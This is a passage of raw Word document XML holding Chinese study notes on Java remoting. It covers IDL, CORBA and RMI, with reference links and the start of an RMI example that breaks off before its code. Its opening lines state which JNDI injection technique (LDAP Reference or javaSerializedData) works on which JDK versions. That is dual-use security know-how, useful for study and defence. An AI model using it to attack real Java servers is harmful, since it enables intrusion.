      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8u191</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7u201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6u211</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本以下，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI + LDAP lookup Reference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BF4E5B" w14:textId="77777777" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B444AC" w14:textId="212DC14B" w:rsidR="00214D88" w:rsidRDefault="00214D88" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8u191</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7u201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6u211</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的版本，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javaSerializedData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2CA612" w14:textId="77777777" w:rsidR="00AE1EAB" w:rsidRDefault="00AE1EAB" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AB48B4" w14:textId="6437097C" w:rsidR="009E614F" w:rsidRDefault="007E46CA" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待研究：</w:t>
      </w:r>
      <w:r w:rsidR="00C46E06" w:rsidRPr="00C46E06">
        <w:t>https://www.freebuf.com/vuls/279465.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D2FD89" w14:textId="77777777" w:rsidR="009E614F" w:rsidRDefault="009E614F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69182F69" w14:textId="77777777" w:rsidR="009E614F" w:rsidRDefault="009E614F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26989B1C" w14:textId="77777777" w:rsidR="009E614F" w:rsidRDefault="009E614F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DD4F92" w14:textId="77777777" w:rsidR="009E614F" w:rsidRDefault="009E614F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D39FF10" w14:textId="77777777" w:rsidR="009E614F" w:rsidRDefault="009E614F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F539E5" w14:textId="77777777" w:rsidR="009E614F" w:rsidRDefault="009E614F" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302E40E8" w14:textId="1E11D6CE" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:t>: CIRBA</w:t>
      </w:r>
      <w:r w:rsidR="00F51173">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F51173">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中立语言</w:t>
      </w:r>
      <w:r w:rsidR="00E7356B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，描述分布式系统各组件之间接口和数据结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C6358" w14:textId="653E7CE8" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF414CD" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Interface Definition Language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，接口定义语言）是一种中立的语言，用于描述分布式系统中各个组件之间的接口和数据结构。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的上下文中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常指的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Common Object Request Broker Architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，公共对象请求代理体系结构）的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CEE48C" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5922B429" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种分布式对象通信的标准，它允许不同的应用程序使用不同的编程语言和运行在不同的计算机平台上的对象之间进行交互。为了使这种跨语言和跨平台的交互成为可能，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为中立的接口描述语言。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236678EA" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3971B1" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序指的是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来定义接口和数据结构，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言生成对应的代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序描述了接口的方法、参数、返回类型以及数据结构的成员和类型等信息。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序，可以在不同的编程语言之间定义一致的接口，并通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现相互调用和交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB4E1F" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0580C54B" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般来说，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写接口定义后，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件编译为对应编程语言的代码。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，包括接口的远程调用接口、客户端存根和服务端骨架等，以便实现分布式对象的通信和交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D9368" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3604B888" w14:textId="61ACC95B" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总而言之，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来定义接口和数据结构，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，从而实现跨语言和跨平台的分布式对象通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BCB30" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B0AC4F" w14:textId="0F78D598" w:rsidR="004A5FF4" w:rsidRDefault="004277F7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>MI</w:t>
      </w:r>
      <w:r w:rsidR="00F0698A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F0698A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00F0698A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特有的远程方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC21624" w14:textId="77777777" w:rsidR="004277F7" w:rsidRDefault="004277F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF905C9" w14:textId="2C63DD19" w:rsidR="004277F7" w:rsidRPr="004277F7" w:rsidRDefault="004277F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004277F7">
        <w:t>https://zhuanlan.zhihu.com/p/188432060</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5329B2A3" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655E1452" w14:textId="77777777" w:rsidR="004A5FF4" w:rsidRDefault="004A5FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3792F802" w14:textId="27CFE3FD" w:rsidR="003F7363" w:rsidRDefault="00BC2AA6" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>斗象解释的</w:t>
      </w:r>
      <w:r w:rsidR="003116B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="003116B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="003116B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JMX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC645A" w14:textId="7373A4E7" w:rsidR="00510842" w:rsidRDefault="006D0DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00EF2C4F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://paper.seebug.org/312/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C65BE1D" w14:textId="77777777" w:rsidR="006D0DF4" w:rsidRPr="006D0DF4" w:rsidRDefault="006D0DF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F6168D" w14:textId="77777777" w:rsidR="00C519F9" w:rsidRDefault="00C519F9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E9764" w14:textId="09CC068D" w:rsidR="00510842" w:rsidRDefault="00C519F9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是网络服务协议，与操作系统和语言无关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFED53F" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524E2561" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47F44990" w14:textId="77777777" w:rsidR="00490EA8" w:rsidRDefault="00490EA8" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当您使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Remote Method Invocation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，远程方法调用）时，您需要定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00C42525">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00C42525">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实现远程对象和设置远程对象的主机和端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。以下是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例，以帮助您更好地理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工作原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B703A4" w14:textId="77777777" w:rsidR="00490EA8" w:rsidRDefault="00490EA8" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABEE130" w14:textId="65135463" w:rsidR="00490EA8" w:rsidRDefault="00490EA8" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，定义远程接口（例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Calculator.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED32FFA" w14:textId="77777777" w:rsidR="00490EA8" w:rsidRDefault="00490EA8" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734C334F" w14:textId="4CDE5FA1" w:rsidR="000B4FF4" w:rsidRDefault="00E34352" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
